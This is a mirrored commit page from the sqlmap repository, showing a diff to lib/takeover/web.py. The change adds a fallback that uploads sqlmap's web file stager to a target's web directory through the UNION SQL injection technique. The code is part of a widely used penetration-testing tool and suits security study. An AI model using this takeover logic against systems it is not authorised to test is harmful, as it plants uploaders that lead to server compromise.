sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-25 19:13:48 +03:00
Code Issues Packages Projects Releases Wiki Activity

fall-back to UNION technique if web file stager was not uploaded with LIMIT

Browse Source
This commit is contained in:
Bernardo Damele 2012-07-20 17:11:22 +01:00
parent a1d2a7913b
commit dba0a96c2e
1 changed files with 16 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
lib/takeover/web.py
View File

@ -14,6 +14,7 @@ from extra.cloak.cloak import decloak
from lib.core.agent import agent from lib.core.agent import agent
from lib.core.common import arrayizeValue from lib.core.common import arrayizeValue
from lib.core.common import Backend from lib.core.common import Backend
from lib.core.common import decloakToMkstemp
from lib.core.common import decloakToNamedTemporaryFile from lib.core.common import decloakToNamedTemporaryFile
from lib.core.common import extractRegexResult from lib.core.common import extractRegexResult
from lib.core.common import getDirs from lib.core.common import getDirs
@ -238,16 +239,28 @@ class Web:
self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/') self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/')
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or "" uplPage = uplPage or ""
if "sqlmap file uploader" not in uplPage: if "sqlmap file uploader" not in uplPage:
warnMsg = "unable to upload the file stager " warnMsg = "unable to upload the file stager "
warnMsg += "on '%s'" % localPath warnMsg += "on '%s'" % localPath
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
continue
elif "<%" in uplPage or "<?" in uplPage: if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
infoMsg = "trying to upload the file stager via "
infoMsg += "UNION technique"
logger.info(infoMsg)
stagerDecloacked = decloakToMkstemp(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
self.unionWriteFile(stagerDecloacked.name, self.webStagerFilePath, "text")
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" not in uplPage:
continue
if "<%" in uplPage or "<?" in uplPage:
warnMsg = "file stager uploaded on '%s', " % localPath warnMsg = "file stager uploaded on '%s', " % localPath
warnMsg += "but not dynamically interpreted" warnMsg += "but not dynamically interpreted"
logger.warn(warnMsg) logger.warn(warnMsg)